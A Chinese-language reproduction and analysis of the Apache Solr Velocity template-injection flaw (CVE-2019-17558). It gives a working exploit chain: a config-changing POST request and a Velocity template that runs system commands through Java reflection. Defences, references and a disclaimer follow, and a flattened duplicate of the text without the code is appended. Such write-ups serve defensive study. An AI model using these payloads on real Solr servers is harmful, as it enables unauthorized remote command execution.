Apache Solr Velocity模板注入漏洞(CVE-2019-17558)复现与分析

漏洞概述

Apache Solr是一个基于Lucene的开源搜索平台，在2019年被曝出存在Velocity模板注入漏洞（CVE-2019-17558）。该漏洞允许攻击者通过Solr的VelocityResponseWriter组件执行任意命令，危害极大。

受影响版本

Apache Solr 5.0.0至8.3.1版本

漏洞原理

Velocity模板引擎：Solr内置了Velocity模板引擎用于生成响应
参数配置不当：当params.resource.loader.enabled设置为true时，允许用户通过HTTP参数传递模板
代码执行：攻击者可以构造恶意的Velocity模板，通过反射机制调用Java Runtime类执行系统命令

漏洞复现步骤

第一步：环境准备

寻找目标Solr服务器（版本需在受影响范围内）
确认可以访问Solr控制台（通常位于/solr路径）

第二步：修改配置

在Core Selector下选择一个节点
访问该节点的配置文件：节点名/config
找到params.resource.loader.enabled参数（默认为false）
发送以下POST请求将其修改为true：

POST /solr/notification_shard1_replica_n83/config HTTP/1.1
Host: xxx.xxx.xx.x
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8,en-US;q=0.7,en;q=0.6
Connection: close
Content-Type: application/json
Content-Length: 259

{
  "update-queryresponsewriter": {
    "startup": "lazy",
    "name": "velocity",
    "class": "solr.VelocityResponseWriter",
    "template.base.dir": "",
    "solr.resource.loader.enabled": "true",
    "params.resource.loader.enabled": "true"
  }
}

第三步：执行命令

构造以下URL执行系统命令（示例中执行id命令）：

select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end

URL解码后的模板内容：

#set($x='') 
#set($rt=$x.class.forName('java.lang.Runtime')) 
#set($chr=$x.class.forName('java.lang.Character')) 
#set($str=$x.class.forName('java.lang.String')) 
#set($ex=$rt.getRuntime().exec('id')) 
$ex.waitFor() 
#set($out=$ex.getInputStream()) 
#foreach($i in [1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end

漏洞分析

Velocity模板语法：使用#set指令设置变量，#foreach进行循环
反射机制：通过$x.class.forName获取Java核心类
命令执行：
- 获取Runtime类实例
- 调用getRuntime().exec()执行系统命令
- 读取命令执行结果并输出

防御措施

升级Solr：升级到8.4.0或更高版本
配置加固：
- 确保params.resource.loader.enabled为false
- 限制Solr控制台的访问权限
网络隔离：将Solr服务器放置在内部网络，限制外网访问

参考链接

原始漏洞报告：https://gist.github.com/s00py/a1ba36a3689fa13759ff910e179fc133
CVE详细信息：https://nvd.nist.gov/vuln/detail/CVE-2019-17558

免责声明

本文仅用于安全研究和教育目的，未经授权对他人系统进行测试是违法行为。请在合法授权范围内进行安全测试。

Apache Solr Velocity模板注入漏洞(CVE-2019-17558)复现与分析漏洞概述 Apache Solr是一个基于Lucene的开源搜索平台，在2019年被曝出存在Velocity模板注入漏洞（CVE-2019-17558）。该漏洞允许攻击者通过Solr的VelocityResponseWriter组件执行任意命令，危害极大。受影响版本 Apache Solr 5.0.0至8.3.1版本漏洞原理 Velocity模板引擎：Solr内置了Velocity模板引擎用于生成响应参数配置不当：当 params.resource.loader.enabled 设置为true时，允许用户通过HTTP参数传递模板代码执行：攻击者可以构造恶意的Velocity模板，通过反射机制调用Java Runtime类执行系统命令漏洞复现步骤第一步：环境准备寻找目标Solr服务器（版本需在受影响范围内）确认可以访问Solr控制台（通常位于 /solr 路径）第二步：修改配置在Core Selector下选择一个节点访问该节点的配置文件：节点名/config 找到 params.resource.loader.enabled 参数（默认为false）发送以下POST请求将其修改为true：第三步：执行命令构造以下URL执行系统命令（示例中执行 id 命令）： URL解码后的模板内容：漏洞分析 Velocity模板语法：使用 #set 指令设置变量， #foreach 进行循环反射机制：通过 $x.class.forName 获取Java核心类命令执行：获取Runtime类实例调用 getRuntime().exec() 执行系统命令读取命令执行结果并输出防御措施升级Solr ：升级到8.4.0或更高版本配置加固：确保 params.resource.loader.enabled 为false 限制Solr控制台的访问权限网络隔离：将Solr服务器放置在内部网络，限制外网访问参考链接原始漏洞报告：https://gist.github.com/s00py/a1ba36a3689fa13759ff910e179fc133 CVE详细信息：https://nvd.nist.gov/vuln/detail/CVE-2019-17558 免责声明本文仅用于安全研究和教育目的，未经授权对他人系统进行测试是违法行为。请在合法授权范围内进行安全测试。